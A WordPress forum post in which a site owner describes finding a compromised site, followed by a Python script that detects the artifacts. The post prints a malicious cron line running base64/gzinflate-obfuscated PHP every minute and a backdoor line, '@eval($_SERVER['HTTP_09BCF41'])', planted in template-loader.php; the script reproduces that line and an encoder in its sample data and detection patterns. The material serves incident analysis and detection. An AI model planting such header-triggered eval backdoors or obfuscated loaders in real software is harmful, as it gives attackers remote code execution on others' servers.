I have/had a server running numerous WordPress sites. The only one that’s ever given me problems is the one running this theme…mostly in the form of unsolicited posts getting put in to my database.
No other site running any other theme was affected. Ever. SQL server can only be accessed via local connections. If someone had exploited somehow and gotten real access to the databases, they’d likely have gone after the other sites. So whatever happened was pretty much sandboxed to a single site.
Then there’s this:
Aug 17 07:50:01 pickmy CRON[87091]: (www-data) CMD (/usr/bin/php -r 'eval(gzinflate(base64_decode("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")));'^M)
Okay…note to self…check cron logs more than every two years because something like this uses so little CPU you’ll never see it; but it was running EVERY SINGLE MINUTE. So I got to working on this and saving one level of obfuscated code…I see this:
a:4:{i:0;s:45:"/var/www/nq4t/wp-includes/template-loader.php";i:1;s:7:"09BCF41";i:2;s:32:"@eval($_SERVER['HTTP_09BCF41']);";i:3;s:35:"~^\s*if.*is_robots[^\{|\:]+(\{|:)~m";}
Okay……at this point I looked back at my day one backups and saw that @eval line in template-loader.php. So I figure it’s something to make sure that line is in the file. What for…I don’t know. The only thing I do know is after an extensive search for every bit of the decoded function, I only found two other results cached from websites that decrypt obfuscated PHP code…anything that was really nasty would have likely been written about over the last two years. Right now I’m more worried about how WordPress was able to insert a cronjob for a user with no shell. In fact I’m ditching WordPress entirely. I used to think it was possible to run one secure, but clearly it’s not.
But either there was something I classify as “sloppy funny business”…or this thing got exploited the first 15 minutes of being up. Hackers are quick, but not that quick.
This reply was modified 2 years, 7 months ago by KM4JOJ.
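As an added example (not code from the original post or from the theme), a small Python script a defender could run to flag the two artifacts the post describes: the per-minute `eval(gzinflate(base64_decode(...)))` cron payload, peeled statically without executing anything, and the `@eval($_SERVER['HTTP_...'])` line planted in template-loader.php. The sample cron lines, file contents and payload are constructed here for illustration; the `HTTP_09BCF41` header name is the one shown in the post.

```python
import base64
import re
import zlib

# Shape of the cron payload in the post: eval(gzinflate(base64_decode("<base64>"))).
STAGED_EVAL = re.compile(
    r"""eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)\s*\)\s*\)""")
# Shape of the backdoor line found in template-loader.php: @eval($_SERVER['HTTP_<name>']).
# Any HTTP request header <name> becomes $_SERVER['HTTP_<NAME>'], so the code run is attacker-chosen.
HEADER_EVAL = re.compile(
    r"""@?eval\s*\(\s*\$_SERVER\s*\[\s*['"](HTTP_[A-Z0-9_]+)['"]\s*\]\s*\)""", re.I)

def peel_layers(code, max_depth=10):
    """Unwrap nested eval(gzinflate(base64_decode(...))) layers without executing them.
    gzinflate() is raw DEFLATE (no zlib header), hence wbits=-15. Returns every layer, outermost first."""
    layers = [code]
    for _ in range(max_depth):
        m = STAGED_EVAL.search(layers[-1])
        if not m:
            break
        inner = zlib.decompress(base64.b64decode(m.group(1)), -15).decode("utf-8", "replace")
        layers.append(inner)
    return layers

def suspicious_cron_lines(lines):
    """Return cron log lines whose command carries a staged eval payload."""
    return [line for line in lines if STAGED_EVAL.search(line)]

def files_with_header_eval(files):
    """Map path -> $_SERVER key for every file containing a header-triggered eval."""
    hits = {}
    for path, src in files.items():
        m = HEADER_EVAL.search(src)
        if m:
            hits[path] = m.group(1)
    return hits

def _wrap(php):
    """Constructed helper: package PHP the way the cron line was built (raw deflate, then base64)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    data = comp.compress(php.encode()) + comp.flush()
    return 'eval(gzinflate(base64_decode("%s")));' % base64.b64encode(data).decode()

# Constructed sample data (not taken from the post): a two-layer payload and two PHP files.
INNER = "@eval($_SERVER['HTTP_09BCF41']);"
SAMPLE_CRON = [
    "Aug 17 07:50:01 host CRON[1]: (www-data) CMD (/usr/bin/php -r '%s')" % _wrap(_wrap(INNER)),
    "Aug 17 07:55:01 host CRON[2]: (root) CMD (/usr/lib/php/sessionclean)",
]
SAMPLE_FILES = {
    "wp-includes/template-loader.php": "<?php\n" + INNER + "\nif ( is_robots() ) { do_robots(); }",
    "wp-includes/version.php": "<?php\n$wp_version = '6.4';",
}

if __name__ == "__main__":
    for line in suspicious_cron_lines(SAMPLE_CRON):
        layers = peel_layers(line)
        print("staged eval in cron: %d layer(s) peeled, innermost: %s" % (len(layers) - 1, layers[-1]))
    for path, key in files_with_header_eval(SAMPLE_FILES).items():
        print("header-triggered eval in %s (request header %s)" % (path, key[5:]))
```

On a live system the same two functions would be fed the actual cron log (or `crontab -l -u www-data`) and the contents of the wp-includes tree, and the peeled innermost layer is what to compare against the day-one backup.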